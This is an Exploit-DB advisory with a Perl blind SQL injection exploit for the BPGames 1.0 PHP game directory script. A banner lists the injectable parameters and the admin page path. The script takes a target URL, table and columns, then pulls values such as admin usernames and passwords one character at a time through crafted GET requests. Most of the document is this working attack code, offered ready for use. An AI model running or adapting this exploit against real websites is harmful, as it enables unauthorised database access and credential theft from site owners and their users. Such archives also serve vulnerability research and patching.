BPGames 1.0 - Blind SQL Injection

EDB-ID:

9838


Author:

OoN Boy

Type:

webapps


Platform:

PHP

Date:

2009-09-22


#[x]===================================================================[x]
# |                     AntiSecurity[dot]org			     	|
#[x]===================================================================[x]
# | Title    		: BPGames 1.0 blind SQL Injection Exploit    	|
# | Software 		: BPGames				     	|
# | Vendor   		: http://bpowerhouse.info		     	|
# | Date    		: 22 September 2009 ( Indonesia )	     	|
# | Author   		: OoN_Boy					|
# | Contact  		: oon.boy9@gmail.com				|
# | Web	    		: http://oonboy.info				|
# | Blog     		: http://oonboy.blogspot.com			|
#[x]===================================================================[x]
# | Technology		: PHP                                           |
# | Database		: MySQL                                         |
# | Version		: 1.0                                           |
# | License		: GNU GPL                                       |
# | Price		: $29.90                                        |
# | Description		: is a game directory site script. The script	| 
# |			  supports multi-language settings. Site users	|
# |			  can search for games according to categories	|
#[x]===================================================================[x]
# | Google Dork 	: gwe ganteng :P				|
#[x]===================================================================[x]
# | Exploit 		: http://localhost/[path]/main.php?cat_id=[sql]	|
# |			  http://localhost/[path]/game.php?game_id=[sql]|
# | Aadmin Page		: http://localhost/[path]/admin/index.php	|
#[x]===================================================================[x]
# | Greetz		: antisecurity.org batamhacker.or.id            |
# |		 	  Vrs-hCk NoGe Paman zxvf Angela Zhang aJe H312Y|
# |			  yooogy mousekill }^-^{ martfella noname s4va  |
# | 		  	  k1tk4t str0ke kaka11 ^s0n g0ku^ Joe Chawanua	|
# |			  Ntc xx_user s3t4n IrcMafia em|nem Pandoe Ronny|
#[x]===================================================================[x]


use HTTP::Request;
use LWP::UserAgent;

$cmsapp = 'BPGames';
$vuln   = 'main.php?cat_id=';   #change vuln game.php?game_id=
#vuln	= 'game.php?game_id=';
$string = 'Previous';		#change if any string
#string = 'Instrucciones';
$maxlen = 32;

my $OS = "$^O";
if ($OS eq 'MSWin32') { system("cls"); } else { system("clear"); }

printf "\n
    $cmsapp
 [x]=================================================[x]
  |     BPGames 1.0 blind SQL Injection Exploit       |
 [x]=================================================[x]

\n";

print " [+] URL Path : "; chomp($web=<STDIN>);
print " [+] Valid ID : "; chomp($id=<STDIN>);
print " [+] Table    : "; chomp($table=<STDIN>);	#table name admins
print " [+] Columns  : "; chomp($columns=<STDIN>);	#column username and password

if ($web =~ /http:\/\// ) { $target = $web."/"; } else { $target = "http://".$web."/"; }

print "\n\n [!] Exploiting $target ...\n\n";
&get_data;
print "\n\n [!] Mission completed.\n\n";

sub get_data() {
	@columns = split(/,/, $columns);
	foreach $column (@columns) {
		print " [+] SELECT $column FROM $table LIMIT 0,1 ...\n";
		syswrite(STDOUT, " [-] $table\@$column> ", 255);
		for (my $i=1; $i<=$maxlen; $i++) {
			my $chr = 0;
			my $found = 0;
			my $char = 48;
			while (!$chr && $char<=57) {
				if(exploit($i,$char) =~ /$string/) {
					$chr = 1;
					$found = 1;
					syswrite(STDOUT,chr($char),1);
				} else { $found = 0; }
				$char++;
			}
			if(!$chr) {
				$char = 97;
				while(!$chr && $char<=122) {
					if(exploit($i,$char) =~ /$string/) {
						$chr = 1;
						$found = 1;
						syswrite(STDOUT,chr($char),1);
					} else { $found = 0; }
					$char++;
				}
			}
			if (!$found) {
				print "\n"; last;
			}
		}
	}
}

sub exploit() {
	my $limit = $_[0];
	my $chars = $_[1];
	my $blind = '+AND+SUBSTRING((SELECT+'.$column.'+FROM+'.$table.'+LIMIT+0,1),'.$limit.',1)=CHAR('.$chars.')';
	my $inject = $target.$vuln.$id.$blind;
	my $content = get_content($inject);
	return $content;
}

sub get_content() {
	my $url = $_[0];
	my $req = HTTP::Request->new(GET => $url);
	my $ua  = LWP::UserAgent->new();
	$ua->timeout(5);
	my $res = $ua->request($req);
	if ($res->is_error){
		print "\n\n [!] Error, ".$res->status_line.".\n\n";
		exit;
	}
	return $res->content;
}

# Exploit End